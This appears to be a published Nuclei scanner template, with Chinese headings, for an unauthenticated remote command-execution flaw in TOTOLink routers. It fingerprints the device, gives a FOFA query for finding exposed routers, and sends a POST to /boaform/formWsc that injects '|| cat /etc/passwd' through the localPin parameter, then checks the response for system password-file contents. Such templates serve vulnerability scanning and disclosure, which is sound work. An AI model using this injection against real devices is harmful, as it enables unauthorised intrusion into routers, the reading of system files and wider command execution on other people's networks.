漏洞描述
TOTOLink routers are vulnerable to unauthenticated remote command execution via the /boaform/formWsc endpoint. An attacker can inject OS commands through the localPin parameter.
totolink-boaform-rce: TOTOLink Router - Remote Command Execution
PoC代码[已公开]
id: totolink-boaform-rce
info:
name: TOTOLink Router - Remote Command Execution
author: ritikchaddha
severity: critical
description: |
TOTOLink routers are vulnerable to unauthenticated remote command execution via the /boaform/formWsc endpoint. An attacker can inject OS commands through the localPin parameter.
reference:
- https://github.com/fizz-is-on-the-way/Iot_vuls/blob/main/N150RT/RCE_formWsc/README.md
classification:
cwe-id: CWE-78
metadata:
max-request: 2
product: TOTOLINK
fofa-query: title="TOTOLINK"
tags: totolink,rce,router,boaform,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code==200'
- 'contains(tolower(body), "totolink")'
condition: and
internal: true
- raw:
- |
POST /boaform/formWsc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
targetAPMac=001A2B3C4D5E&targetAPSsid=3232&submit-url=aaaaaa&localPin=aaaa%20||%20cat%20/etc/passwd
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022015273a94d319b86a2a5a2c236da7f179670910ac0359250a2e1f9a558ab7301602210083338915aab313861f06ccfa6b1a98627100bbd08e6ef64d3d362fcd90dcdeb5:922c64590222798bb761d5b6d8e72950